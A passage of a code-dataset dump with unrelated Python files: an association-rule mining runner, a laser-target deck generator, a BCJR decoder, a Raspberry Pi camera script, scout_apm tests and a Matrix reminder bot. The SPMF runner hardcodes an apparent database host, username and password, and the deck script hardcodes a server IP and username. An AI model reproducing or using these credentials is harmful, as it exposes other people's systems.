Tool\",\n long_description=open(\"README.md\").read(),\n install_requires=open(\"requirements.txt\").readlines(),\n license=\"Apache\",\n entry_points={\"console_scripts\": [\"b3 = b3.main:main\"]},\n packages=setuptools.find_packages(PY_SRC_DIR),\n package_dir={\"\": PY_SRC_DIR})\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"533799781","text":"#-*- coding: utf-8 -*-\n'''\nCreated on 2015. 11. 17\n@author: Zeck\n'''\nfrom __future__ import print_function\nfrom zeck.database import DBHelper\nimport os\nfrom threading import Thread, Lock\nfrom Queue import Queue\nfrom zeck.utils import HashPath, Progress\nfrom zeck.utils.Math import combination\nfrom sys import stdout\nfrom SPMF import SPMF\n###############################################################################################################\n\nclass SPMFDist(object):\n #dependency\n spmf = None\n db = None\n lock = None\n queue = None\n\n\n #options\n last_work= 0\n combimax = 0\n filepath = u''\n outputpath = u''\n filename = u''\n hash_size = 4 #progress\n hash_level = 9 #progress\n minsup = 0.9 #algorithm\n mincof = 0.7 #algorithm\n minlift = 1 #algorithm\n\n def __init__(self, db_name):\n self.db = DBHelper(u'zeus.sigse.org', u'seal_mvn', u'mvnmanager.', db_name)\n self.spmf = SPMF()\n self.lock = Lock()\n self.queue = Queue()\n self.progress = Progress(u'SPMF', 10, 500)\n pass\n\n def get_project_cnt(self):\n '''\n # project 수와 명을 구함\n 실제 작업은 inner_func로 넘김\n :param cur:\n :return:\n '''\n def _result_func(res):\n count = 0\n for row in res:\n count +=1\n return count\n res = self.db.executePROC('GET_PROJECTLIST', None, _result_func)\n self.db.disconnection()\n return res\n\n def analysis(self, filenum):\n hashtext = u'%%0%dd' % (self.hash_level*self.hash_size)\n distpath = HashPath.sequence(hashtext%filenum, self.hash_size, self.hash_level-1)\n\n #input file name\n inputname = os.path.join(self.filepath, distpath)\n inputname = os.path.join(inputname, u'%s_%d.arff'%(self.filename, filenum))\n\n #output file create\n outputname = os.path.join(self.outputpath, distpath)\n self.lock.acquire()\n if not os.path.exists(outputname):\n os.makedirs(outputname)\n self.lock.release()\n outputname = os.path.join(outputname, u'%s_%d.txt'%(self.filename, filenum))\n\n #execute program\n if self.minlift != 1:\n self.spmf.run(u'FPGrowth_association_rules_with_lift', inputname, outputname, (self.minsup, self.mincof, self.minlift))\n else:\n self.spmf.run(u'FPGrowth_association_rules', inputname, outputname, (self.minsup, self.mincof))\n\n\n # Worker in each thread (work until queue is empty)\n def worker(self, tid):\n while True:\n item = self.queue.get() # get item\n self.analysis(item) # a work with a item\n\n self.lock.acquire()\n self.progress.check(u'q:%d'% self.queue.qsize()) # progress\n self.lock.release()\n\n self.queue.task_done() # notice done a item\n\n def print_info(self, _stream):\n _stream.write(u'Work DB : %s\\n'%self.db.dbname)\n _stream.write(u'input path : %s\\n'%self.filepath)\n _stream.write(u'output path : %s\\n'%self.outputpath)\n _stream.write(u'filename : %s\\n'%self.filename)\n _stream.write(u'Loaded projects: %d\\n'%self.project_count)\n _stream.write(u'combination of list = %d\\n'% self.combimax)\n _stream.write(u'min support = %.4f\\n'% self.minsup)\n _stream.write(u'min confidence = %.4f\\n'% self.mincof)\n _stream.write(u'min lift = %.4f\\n' % self.minlift)\n\n def start(self, _poolsize, _column_num):\n #initialize\n self.project_count = self.get_project_cnt()\n self.combimax = combination(self.project_count, _column_num)\n if os.path.exists(self.outputpath) is False:\n os.makedirs(self.outputpath)\n\n #show options\n self.print_info(stdout)\n self.print_info(open(os.path.join(self.outputpath, u'summary.txt'),'w'))\n\n #worker therad 생성\n for tid in range(_poolsize):\n t = Thread(target=self.worker, args=(tid,))\n t.daemon = True #work as a deamon\n t.start()\n\n #progress start\n self.progress.set_point(self.last_work).set_upperbound(self.combimax)\n self.progress.start()\n\n # input work to syncronized queue\n workitem = self.last_work\n while workitem < self.combimax:\n self.queue.put(workitem)\n workitem += 1\n self.queue.join() # block until all tasks are done\n\n self.progress.done()\n pass\n\n\n\n\n###############################################################################################################\n###############################################################################################################\n###############################################################################################################\nif __name__ == '__main__':\n db_name = u'MetaMavenOgirardotMini'\n #filename = os.path.dirname(os.path.abspath(__file__))\n program = SPMFDist(db_name)\n program.filepath = u'E:\\\\_Temp\\\\mvn\\\\dist2'\n program.outputpath = u'E:\\\\_Temp\\\\mvn\\\\SPMFdist_mini'\n program.filename = u'dep'\n program.minsup = 0.01\n program.mincof = 0.01\n program.minlift = 1\n program.last_work = 906221 #재시작시정 번호 지\n program.hash_level = 3\n program.hash_size = 3\n #program.startOne()\n program.start(_poolsize=10, _column_num=2)\n","sub_path":"analysis/approach_SPMFdist/SPMFDist.py","file_name":"SPMFDist.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"413262753","text":"import numpy as np\nimport pyh2d as h2d\n\"\"\"\nThis will take an existing h2d '.inf' file and, based on the users speciffications set out below\nre-write the deck. It will specify:\n\na) A multi-layer planar target. The user can specify the following options (without having to\nchange this python code)\n 1) region dimensions, materials, and densities\n 2) number of regions\n 3) adjacent cell size ratios in the z-direction\n\nb) A 3d 'bundle' of rays which combined form a laser beam. The ray trace is done\nin 3d and then the energy deposition mapped onto the 2d hydro grid. In order to create a\nuniform ray density (and hence appropriate intensity profile) this is done using a\nCartesian grid of initial rays which are then masked. Currently the mask is circular\nin the plane of the beam, but elliptical beams could be trivially added, as could multiple beams.\nThe user can specify:\n 1) The number of rays in x and y\n 2) The position of the lens and focal spot in 3D.\n 3) The beam's radial supergaussian intensity profile.\n 4) The beam's f/#\n 5) Laser power temporal profile\n\nc) Having calculate the varous paramters based on the users choices, various plots are then made.\n\nd) Finally an existing h2d '.inf' file (which must be in the same directory as Python is running)\nis opened, read in, then re-written with the new data. In order for the code to alter the\nappropriate sections, the file must contain the following text:\n'c start zoning'\n'c end zoning'\n'c start rays'\n'c end rays'\n'c start laser power'\n'c end laser power'\n\n\"\"\"\n\nh2d.g.ip_address = '130.246.68.46' #the ip address of the h2d server\nh2d.g.username = 'rscott' #your username\nh2d.g.server_base_directory = '/home/rscott/' #your base directory on the h2d server\nh2d.g.original_h2d_file = 'h2d.inf' #the name of the original h2d input deck\nh2d.g.final_h2d_file = h2d.g.original_h2d_file #the name of the new h2d input deck\nh2d.g.write_file = 1 #is the h2d '.inf' file written\nh2d.g.ray_trace_type = '3d'\nh2d.g.plot_rays = 1 #Are the rays plotted?\nh2d.g.plot_rays_3d = 1 #Are the rays plotted in 3D?(can be slow if many rays)\nh2d.g.clip_beam_x = 0 #if the beams start or finish at x<0 they are removed\nh2d.g.clip_beam_y = 0 #if the beams start or finish at y<0 they are removed\nh2d.g.testing = 0 #extra info/plots for Python script testing\n\n################################################################################################\n#############################Target parameters##################################################\n################################################################################################\n\nh2d.g.regions = 2\n#target per-region params:[region 1 ,region2 ] \n#to add another region, add a column to each parameter below\nh2d.g.region_density = [ 2.70 , 1.78 ]#per-region density\nh2d.g.region_tele = [ 293. , 293. ]#per-region electron temperature(K)(units chaged to keV below)\nh2d.g.region_tion = [ 293. , 293. ]#per-region ion temperature(K)\nh2d.g.region_trad = [ 293. , 293. ]#per-region radiation temperature(K)\nh2d.g.region_bfld = [ 0000. , 0000. ]#per-region B field (Gauss)\nh2d.g.region_ratios_z = [ 1.40 , 1.02 ]#per-region ratios of adjacent cell sizes in Z drn\nh2d.g.region_ratios_r = [1.05 ]#ratios of adjacent cell sizes in R drn (applies to all regions)\nh2d.g.target_coords_r = [0. , 1000.0e-4,1000.0e-4]#radial coordinates of target\nh2d.g.target_coords_z = [0. , 0.3e-4, 10.3e-4]#z coordinates of target regions (#regions +1)\nh2d.g.region_cell_n_r = [0 , 50 , 50 ]#num radial cells in tgt regions (first must be 0)\nh2d.g.region_cell_n_z = [0 , 2 , 75 ]#was 6 #num z drn cells in target regions (first must be 0)\n\n##################################################################################################\n##########################Laser parameters########################################################\n##################################################################################################\n\nh2d.g.nrays_x = 250 #number of rays in x before clipping\nh2d.g.nrays_y = 250 #number of rays in y before clipping\nh2d.g.rays_dumped = 500 #~number of rays dumped to file (randomly selected)\nh2d.g.super_g_r0 = 50e-4 #radius of the supergaussian beam intensity profile\nh2d.g.focus_rad = 2.*h2d.g.super_g_r0 #radius at which no more rays are launched\nh2d.g.super_g_exp = 5. #supergaussian exponent of beam intensity profile\nh2d.g.f_number = 10 #the f number of the lens\nh2d.g.focus = [0000e-4, 0000e-4, 0e-4]#the position of the focal spot centre [x,y,z]\nh2d.g.lens = [0000e-4, 0000e-4,-4000e-4]#the position of the centre of the lens [x,y,z]\nh2d.g.min_ray_pwr = 1e-5 #Normalised power below which rays are removed\nh2d.g.beam_angle_xy = 00 #beam rotation in xy plane(deg):clockwis from +ve R axis\n\n#laser pulse shape time(s) power(W)\nn_times = 4 #number of laser powers\nlaser_int = np.zeros((n_times,2));\nh2d.g.laser_pwr = np.zeros((n_times,2));\nt=-1;\nt+=1;h2d.g.laser_pwr[t,] = [0.0, 0.0 ]\nt+=1;h2d.g.laser_pwr[t,] = [0.1e-9, 1.65e11 ]\nt+=1;h2d.g.laser_pwr[t,] = [1.9e-9, 1.65e11 ]\nt+=1;h2d.g.laser_pwr[t,] = [2.0e-9, 0.0 ]\n\n\"\"\"\nfrom Riley TAW\nn_times = 11 #number of laser powers\nlaser_int = np.zeros((n_times,2));\nh2d.g.laser_pwr = np.zeros((n_times,2));\nt+=1;h2d.g.laser_pwr[t,] = [0.0, 0.0 ]\nt+=1;h2d.g.laser_pwr[t,] = [0.27e-09, 1.14e+11]\nt+=1;h2d.g.laser_pwr[t,] = [0.54e-09, 1.92e+11]\nt+=1;h2d.g.laser_pwr[t,] = [0.81e-09, 1.76e+11]\nt+=1;h2d.g.laser_pwr[t,] = [1.08e-09, 1.59e+11]\nt+=1;h2d.g.laser_pwr[t,] = [1.35e-09, 1.16e+11]\nt+=1;h2d.g.laser_pwr[t,] = [1.62e-09, 6.72e+10]\nt+=1;h2d.g.laser_pwr[t,] = [1.89e-09, 4.71e+10]\nt+=1;h2d.g.laser_pwr[t,] = [2.16e-09, 2.41e+10]\nt+=1;h2d.g.laser_pwr[t,] = [2.43e-09, 9.79e+09]\nt+=1;h2d.g.laser_pwr[t,] = [2.70e-09, 0.0 ]\n\"\"\"\n\nh2d.g.region_tele = np.asarray(h2d.g.region_tele)/(11605.*1000.) #K => keV\nh2d.g.region_tion = np.asarray(h2d.g.region_tion)/(11605.*1000.)\nh2d.g.region_trad = np.asarray(h2d.g.region_trad)/(11605.*1000.)\n\nif(h2d.g.ray_trace_type == '3d'):\n a = h2d.laser_rays_3d()\nelse:\n print('This deck is for 3d rays - use alternative deck if you want 2d')\n\nif(h2d.g.write_file==1):\n print('About to write new h2d input file, this may take a while if there are lots of rays...')\n a = h2d.write_planar_deck()\n","sub_path":"pyh2d/decks/planar_tgt_3d_rays/deck_planar_target_3d_rays.py","file_name":"deck_planar_target_3d_rays.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"584309732","text":"import numpy as np\r\nclass markov_bcjr:\r\n def int_dist(p1):\r\n return np.array([p1,1-p1])\r\n def state_change(p2,p3):\r\n return np.array([[1-p2,p2],[p3,1-p3]])\r\n def likelihood_zero(u):\r\n return (np.exp(u)/(np.exp(u)+1))\r\n def likelihood_one(u):\r\n return (1/(np.exp(u)+1))\r\n def soft_prob(variance,x,a):\r\n \r\n return (1/np.sqrt(2*np.pi*variance))*np.exp(-(x*x+a*a-2*a*x)/(2*variance))\r\n \r\n def hard_dec(x):\r\n if x<0:\r\n return 1\r\n else:\r\n return 0\r\n \r\n def form_path(inp,variance,p2,p3,p1):\r\n t=markov_bcjr.state_change(p2,p3)\r\n k=markov_bcjr.int_dist(p1)\r\n \r\n l=len(inp)\r\n v=variance\r\n \r\n l0=[]\r\n l1=[]\r\n l2=[]\r\n d=[]\r\n d1=[]\r\n h=inp[0]\r\n f=[]\r\n s=[]\r\n \r\n l0.append(np.log(k[0]*markov_bcjr.soft_prob(v,h,-1)))\r\n l1.append(np.log(k[1]*markov_bcjr.soft_prob(v,h,+1))) \r\n d.append(max([l0[0],l1[0]]))\r\n a=np.array([l0[0],l1[0]])\r\n d1.append(2*(a.argmax())-1)\r\n l2.append(l0[0]-l1[0])\r\n f.append(markov_bcjr.hard_dec(-l2[0]))\r\n s.append(markov_bcjr.hard_dec(l2[0]))\r\n for j in range(1,l):\r\n a=[]\r\n h=inp[j]\r\n \r\n e0=markov_bcjr.soft_prob(v,h,-1)\r\n e1=markov_bcjr.soft_prob(v,h,+1)\r\n f0=markov_bcjr.likelihood_zero(l2[j-1])\r\n f1=markov_bcjr.likelihood_one(l2[j-1])\r\n l0.append(np.log(t[0][0]*e0*f0+t[1][0]*e0*f1))\r\n l1.append(np.log(t[0][1]*e1*f0+t[1][1]*e1*f1))\r\n l2.append(np.log(t[0][0]*e0*f0+t[1][0]*e0*f1)-np.log(t[0][1]*e1*f0+t[1][1]*e1*f1))\r\n d.append(max([l0[j],l1[j]]))\r\n a=np.array([l0[j],l1[j]])\r\n d1.append(2*(a.argmax())-1)\r\n f.append(markov_bcjr.hard_dec(-l2[j]))\r\n s.append(markov_bcjr.likelihood_one(l2[j]))\r\n continue\r\n return l0,l1,d,d1,l2,f,s\r\n def markov_seq_path(inp,e,p2,p3,p1):\r\n l=np.shape(inp)[0]\r\n l1=np.shape(inp)[1]\r\n o0=[]\r\n o1=[]\r\n o2=[]\r\n o3=[]\r\n o4=[]\r\n o5=[]\r\n o6=[]\r\n \r\n for i in range(0,l):\r\n k0,k1,d,d1,d2,d3,d4=markov_bcjr.form_path(inp[i],e,p2,p3,p1)\r\n \r\n o0.append(k0)\r\n o1.append(k1)\r\n o2.append(d)\r\n o3.append(d1)\r\n o4.append(d2)\r\n o5.append(d3)\r\n o6.append(d4)\r\n return o0,o1,o2,o3,o4,o5,o6\r\n def compute_gamma(inp,p2,p3,variance):\r\n g0=np.zeros((np.shape(inp)[0],2))\r\n g1=np.zeros((np.shape(inp)[0],2))\r\n s=markov_bcjr.state_change(p2,p3)\r\n v=variance\r\n g0[0][0]=np.log(0.5*markov_bcjr.soft_prob(v,inp[0],-1))\r\n g1[0][1]=np.log(0.5*markov_bcjr.soft_prob(v,inp[0],+1))\r\n l=len(inp)\r\n for i in range(1,l):\r\n g0[i][0]=np.log(s[0][0]*markov_bcjr.soft_prob(v,inp[i],-1))\r\n g0[i][1]=np.log(s[0][1]*markov_bcjr.soft_prob(v,inp[i],+1))\r\n g1[i][0]=np.log(s[1][0]*markov_bcjr.soft_prob(v,inp[i],-1))\r\n g1[i][1]=np.log(s[1][1]*markov_bcjr.soft_prob(v,inp[i],+1))\r\n continue\r\n return g0,g1\r\n \r\n \r\n \r\n def forward_recursion(inp,p2,p3,variance):\r\n g0,g1=markov_bcjr.compute_gamma(inp,p2,p3,variance)\r\n a0=np.zeros(np.shape(inp)[0])\r\n a1=np.zeros(np.shape(inp)[0])\r\n l=len(inp)\r\n a0[0]=np.log(1*np.exp(g0[0][0]))\r\n a1[0]=np.log(1*np.exp(g1[0][1]))\r\n \r\n for i in range(1,l):\r\n a0[i]=max(a0[i-1]+g0[i][0],a1[i-1]+g1[i][0])\r\n a1[i]=max(a0[i-1]+g0[i][1],a1[i-1]+g1[i][1])\r\n \r\n continue\r\n return a0,a1\r\n def backward_recursion(inp,p2,p3,variance):\r\n g0,g1=markov_bcjr.compute_gamma(inp,p2,p3,variance)\r\n l=len(inp)\r\n b0=np.zeros(np.shape(inp)[0])\r\n b1=np.zeros(np.shape(inp)[0])\r\n b0[l-1]=np.log(1*(p3/(p2+p3)))\r\n b1[l-1]=np.log(1*(p2/(p2+p3)))\r\n \r\n for i in range(0,l-1):\r\n b0[l-2-i]=max(b0[l-1-i]+g0[l-i-1][0],b1[l-1-i]+g0[l-1-i][1])\r\n b1[l-2-i]=max(b0[l-1-i]+g1[l-i-1][0],b1[l-1-i]+g1[l-1-i][1])\r\n \r\n continue\r\n return b0,b1\r\n def bcjr_out(inp,p2,p3,variance):\r\n \r\n if len(inp)==0:\r\n return inp\r\n else:\r\n g0,g1=markov_bcjr.compute_gamma(inp,p2,p3,variance)\r\n a0,a1=markov_bcjr.forward_recursion(inp,p2,p3,variance)\r\n b0,b1=markov_bcjr.backward_recursion(inp,p2,p3,variance)\r\n l=len(inp)\r\n l1=[]\r\n l2=[]\r\n l3=[]\r\n r0=g0[0][0]+b0[0]\r\n r1=g1[0][1]+b1[0]\r\n r=(r0-r1)\r\n l1.append((r))\r\n l2.append(markov_bcjr.hard_dec(l1[0]))\r\n l3.append(1-markov_bcjr.likelihood_zero(r))\r\n for i in range(1,l):\r\n r0=max(a0[i-1]+g0[i][0]+b0[i],a1[i-1]+g1[i][0]+b0[i])\r\n r1=max(a0[i-1]+g0[i][1]+b1[i],a1[i-1]+g1[i][1]+b1[i])\r\n r=(r0-r1)\r\n l1.append(r)\r\n l2.append(markov_bcjr.hard_dec(l1[i]))\r\n l3.append(1-markov_bcjr.likelihood_zero(r))\r\n continue\r\n return l1,l2,l3\r\n def bcjr_arr_out(in_data,p2,p3,variance):\r\n s1=np.shape(in_data)[0]\r\n o1=[]\r\n o2=[]\r\n o3=[]\r\n for i in range(0,s1):\r\n if len(in_data[i])==0:\r\n o1.append(in_data[i])\r\n o2.append(in_data[i])\r\n o3.append(in_data[i])\r\n else:\r\n l1,l2,l3=markov_bcjr.bcjr_out(in_data[i],p2,p3,variance)\r\n o1.append(l1)\r\n o2.append(l2)\r\n o3.append(l3)\r\n continue\r\n return o1,o2,o3\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","sub_path":"bcjr1_2.py","file_name":"bcjr1_2.py","file_ext":"py","file_size_in_byte":6068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"295026618","text":"# -*-coding:utf-8-*-\n\nimport dbp_pb2 as dbp\nimport sys\nsys.path.append('/usr/local/lib/xlvip-1.0.0.egg')\nfrom xlvip.protobuf_message_factory import ProtobufMessageFactory\nfrom xlvip.protobuf_message_factory import message_to_string\nfrom xlvip.protobuf_socket import ProtobufSocket\nimport logging\n\nclass DbproxyClient(ProtobufSocket):\n logger = logging.getLogger('DbproxyClient')\n def query_gauth_user_info(self, userid):\n self.logger.debug('query_gauth_user_info: userid=' + str(userid))\n req = dbp.GauthUserInfoReq()\n req.sequence = 0\n req.userid = userid\n resp = dbp.GauthUserInfoResp()\n self.send_recv(req, resp)\n self.logger.debug('query_gauth_user_info: userid=' + str(userid)\n + ', got resp=' + message_to_string(resp))\n return resp\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG) # 输出到屏幕\n #logging.basicConfig(level=logging.DEBUG, filename='/tmp/dbproxy_client.log') # 输出到文件\n\n host = 'localhost'\n port = 12811\n client = DbproxyClient()\n client.open(host, port)\n resp = client.query_gauth_user_info(30456461)\n resp = client.query_gauth_user_info(2)\n client.close()\n\n # 支持在同一个client上多次打开、关闭\n client.open(host, port)\n resp = client.query_gauth_user_info(7)\n client.close()\n\n","sub_path":"framework/xl_lixian_xlvip/examples/python/dbproxy_client.py","file_name":"dbproxy_client.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"375285700","text":"import logging\nfrom datetime import datetime, timedelta\nfrom typing import Dict, Optional, Tuple\n\nimport pytz\nfrom apscheduler.job import Job\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\nfrom apscheduler.triggers.cron import CronTrigger\nfrom apscheduler.triggers.date import DateTrigger\nfrom apscheduler.triggers.interval import IntervalTrigger\nfrom apscheduler.util import timedelta_seconds\nfrom nio import AsyncClient\n\nfrom matrix_reminder_bot.config import CONFIG\nfrom matrix_reminder_bot.functions import make_pill, send_text_to_room\n\nlogger = logging.getLogger(__name__)\n\n# The object that runs callbacks at a certain time\nSCHEDULER = AsyncIOScheduler()\n\n# How often an alarm should sound after the reminder it's attached to\nALARM_TIMEDELTA = timedelta(minutes=5)\n\n\nclass Reminder(object):\n \"\"\"An object containing information about a reminder, when it should go off,\n whether it is recurring, etc.\n\n Args:\n client: The matrix client\n store: A Storage object\n room_id: The ID of the room the reminder should appear in\n start_time: When the reminder should first go off\n timezone: The database name of the timezone this reminder should act within\n reminder_text: The text to include in the reminder message\n recurse_timedelta: Optional. How often to repeat the reminder\n target_user: Optional. A user ID of a specific user to mention in the room while\n reminding\n alarm: Whether this reminder is an alarm. Alarms are reminders that fire every 5m\n after they go off normally, until they are silenced.\n \"\"\"\n\n def __init__(\n self,\n client: AsyncClient,\n store,\n room_id: str,\n reminder_text: str,\n start_time: Optional[datetime] = None,\n timezone: Optional[str] = None,\n recurse_timedelta: Optional[timedelta] = None,\n cron_tab: Optional[str] = None,\n target_user: Optional[str] = None,\n alarm: bool = False,\n ):\n self.client = client\n self.store = store\n self.room_id = room_id\n self.timezone = timezone\n self.start_time = start_time\n self.reminder_text = reminder_text\n self.cron_tab = cron_tab\n self.recurse_timedelta = recurse_timedelta\n self.target_user = target_user\n self.alarm = alarm\n\n # Schedule the reminder\n\n # Determine how the reminder is triggered\n if cron_tab:\n # Set up a cron trigger\n trigger = CronTrigger.from_crontab(cron_tab, timezone=timezone)\n elif recurse_timedelta:\n # Use an interval trigger (runs multiple times)\n\n # If the start_time of this reminder was in daylight savings for this timezone,\n # and we are no longer in daylight savings, alter the start_time by the\n # appropriate offset.\n # TODO: Ideally this would be done dynamically instead of on reminder construction\n tz = pytz.timezone(timezone)\n start_time = tz.localize(start_time)\n now = tz.localize(datetime.now())\n if start_time.dst() != now.dst():\n start_time += start_time.dst()\n\n trigger = IntervalTrigger(\n # timedelta.seconds does NOT give you the timedelta converted to seconds\n # Use a method from apscheduler instead\n seconds=int(timedelta_seconds(recurse_timedelta)),\n start_date=start_time,\n )\n else:\n # Use a date trigger (runs only once)\n trigger = DateTrigger(run_date=start_time, timezone=timezone)\n\n # Note down the job for later manipulation\n self.job = SCHEDULER.add_job(self._fire, trigger=trigger)\n\n self.alarm_job = None\n\n async def _fire(self):\n \"\"\"Called when a reminder fires\"\"\"\n logger.debug(\"Reminder in room %s fired: %s\", self.room_id, self.reminder_text)\n\n # Build the reminder message\n target = self.target_user if self.target_user else \"@room\"\n message = f\"{make_pill(target)} {self.reminder_text}\"\n\n # If this reminder has an alarm attached...\n if self.alarm:\n # Inform the user that an alarm will go off\n message += (\n f\"\\n\\n(This reminder has an alarm. You will be reminded again in 5m. \"\n f\"Use the `{CONFIG.command_prefix}silence` command to stop).\"\n )\n\n # Check that an alarm is not already ongoing from a previous run\n if not (self.room_id, self.reminder_text.upper()) in ALARMS:\n # Start alarming\n self.alarm_job = SCHEDULER.add_job(\n self._fire_alarm,\n trigger=IntervalTrigger(\n # timedelta.seconds does NOT give you the timedelta converted to\n # seconds. Use a method from apscheduler instead\n seconds=int(timedelta_seconds(ALARM_TIMEDELTA)),\n ),\n )\n ALARMS[(self.room_id, self.reminder_text.upper())] = self.alarm_job\n\n # Send the message to the room\n await send_text_to_room(self.client, self.room_id, message, notice=False)\n\n # If this was a one-time reminder, cancel and remove from the reminders dict\n if not self.recurse_timedelta and not self.cron_tab:\n # We set cancel_alarm to False here else the associated alarms wouldn't even\n # fire\n self.cancel(cancel_alarm=False)\n\n async def _fire_alarm(self):\n logger.debug(\"Alarm in room %s fired: %s\", self.room_id, self.reminder_text)\n\n # Build the alarm message\n target = self.target_user if self.target_user else \"@room\"\n message = (\n f\"Alarm: {target} {self.reminder_text} \"\n f\"(Use `{CONFIG.command_prefix}silence [reminder text]` to silence).\"\n )\n\n # Send the message to the room\n await send_text_to_room(self.client, self.room_id, message, notice=False)\n\n def cancel(self, cancel_alarm: bool = True):\n \"\"\"Cancels a reminder and all recurring instances\n\n Args:\n cancel_alarm: Whether to also cancel alarms of this reminder\n \"\"\"\n logger.debug(\n \"Cancelling reminder in room %s: %s\", self.room_id, self.reminder_text\n )\n\n # Remove from the in-memory reminder and alarm dicts\n REMINDERS.pop((self.room_id, self.reminder_text.upper()), None)\n\n # Delete the reminder from the database\n self.store.delete_reminder(self.room_id, self.reminder_text)\n\n # Delete any ongoing jobs\n if self.job and SCHEDULER.get_job(self.job.id):\n self.job.remove()\n\n # Cancel alarms of this reminder if required\n if cancel_alarm:\n ALARMS.pop((self.room_id, self.reminder_text.upper()), None)\n\n if self.alarm_job and SCHEDULER.get_job(self.alarm_job.id):\n self.alarm_job.remove()\n\n\n# Global dictionaries\n#\n# Both feature (room_id, reminder_text) tuples as keys\n#\n# reminder_text should be accessed and stored as uppercase in order to\n# allow for case-insensitive matching when carrying out user actions\nREMINDERS: Dict[Tuple[str, str], Reminder] = {}\nALARMS: Dict[Tuple[str, str], Job] = {}\n","sub_path":"matrix_reminder_bot/reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"392191208","text":"from picamera import PiCamera\nfrom time import sleep\nimport time\nimport datetime\nimport RPi.GPIO as GPIO\n\ndef getDateString():\n dt = datetime.datetime.now();y = dt.year - 2000 ;hr = dt.hour\n if hr < 10:\n hr = \"0\" + str(hr)\n me = dt.minute\n if me < 10:\n me = \"0\" + str(me)\n timestring = str(y) + str(dt.month) + str(dt.day)+\"-\"+str(hr)+str(me)+\".\"+str(dt.second)\n return timestring\n\ndef camPict():\n filename = getDateString()\n filename = filename + \".jpg\"\t\n camera = PiCamera()\n #camera.resolution = (1024, 768)\n camera.rotation = 180\n camera.start_preview()\n # Camera warm-up time\n sleep(1)\n camera.capture(filename)\n camera.stop_preview()\n\ndef ussScan():\n try:\n GPIO.setmode(GPIO.BOARD)\n PIN_TRIGGER = 7\n PIN_ECHO = 11\n GPIO.setup(PIN_TRIGGER, GPIO.OUT)\n GPIO.setup(PIN_ECHO, GPIO.IN)\n GPIO.output(PIN_TRIGGER, GPIO.LOW)\n #print (\"Waiting for sensor to settle\")\n time.sleep(1)\n print (\"Calculating distance\")\n GPIO.output(PIN_TRIGGER, GPIO.HIGH)\n time.sleep(0.00001)\n GPIO.output(PIN_TRIGGER, GPIO.LOW)\n while GPIO.input(PIN_ECHO)==0:\n pulse_start_time = time.time()\n while GPIO.input(PIN_ECHO)==1:\n pulse_end_time = time.time()\n pulse_duration = pulse_end_time - pulse_start_time\n distance = round(pulse_duration * 17150, 2)\n print (\"Distance:\",distance,\"cm\")\n if (distance < 100):\n camPict()\n\n finally:\n GPIO.cleanup()\n\ndef main():\n count = 0\n while(count == 0):\n ussScan()\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n","sub_path":"camera/cam-uss-0.py","file_name":"cam-uss-0.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"182616981","text":"# coding=utf-8\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pytest\n\nfrom scout_apm.core.metadata import report_app_metadata\nfrom tests.compat import mock\nfrom tests.tools import pretend_package_unavailable\n\n\n@mock.patch(\"scout_apm.core.socket.CoreAgentSocket.send\")\ndef test_report_app_metadata(send):\n report_app_metadata()\n\n assert send.call_count == 1\n (command,), kwargs = send.call_args\n assert kwargs == {}\n\n message = command.message()\n assert message[\"ApplicationEvent\"][\"event_type\"] == \"scout.metadata\"\n data = message[\"ApplicationEvent\"][\"event_value\"]\n assert data[\"language\"] == \"python\"\n # pytest is installed, since it's running tests right now.\n assert (\"pytest\", pytest.__version__) in data[\"libraries\"]\n\n\n@mock.patch(\"scout_apm.core.socket.CoreAgentSocket.send\")\ndef test_report_app_metadata_no_pkg_resources(send):\n with pretend_package_unavailable(\"pkg_resources\"):\n report_app_metadata()\n\n assert send.call_count == 1\n (command,), kwargs = send.call_args\n assert kwargs == {}\n\n message = command.message()\n assert message[\"ApplicationEvent\"][\"event_type\"] == \"scout.metadata\"\n assert message[\"ApplicationEvent\"][\"event_value\"][\"libraries\"] == []\n","sub_path":"tests/unit/core/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"306833045","text":"#Write a program that prompts for a file name, then opens that file and reads through the file, looking for lines of the form:\n#X-DSPAM-Confidence: 0.8475\n#Count these lines and extract the floating point values from each of the lines and compute the average of those values and produce an output as shown below.\n#Do not use the sum() function or a variable named sum in your solution.\n#You can download the sample data at http://www.py4e.com/code3/mbox-short.txt when you are testing below enter mbox-short.txt as the file name.\ncount = 0\ntot = 0\nfname = input(\"Enter file name: \")\nfh = open(fname)\nfor line in fh:\n if line.startswith(\"X-DSPAM-Confidence:\") :\n count = count + 1\n num = float(line[21:]) #21 is the position we find 0 in the lines starting with X-DSPAM:\n tot = num + tot\n avg = tot/count\nprint(\"Average spam confidence:\",avg)\n","sub_path":"ex7.2/ex7.2.py","file_name":"ex7.2.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"405678704","text":"import pandas as pd\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport importlib, argparse\nimport csv\n\n# ------------------------------------------------------------------------------------------------\n# This script will draw a table with AUCs (areas under ROC curve) values based on the CSV\n# file stored in \"AUCs_path\" with version 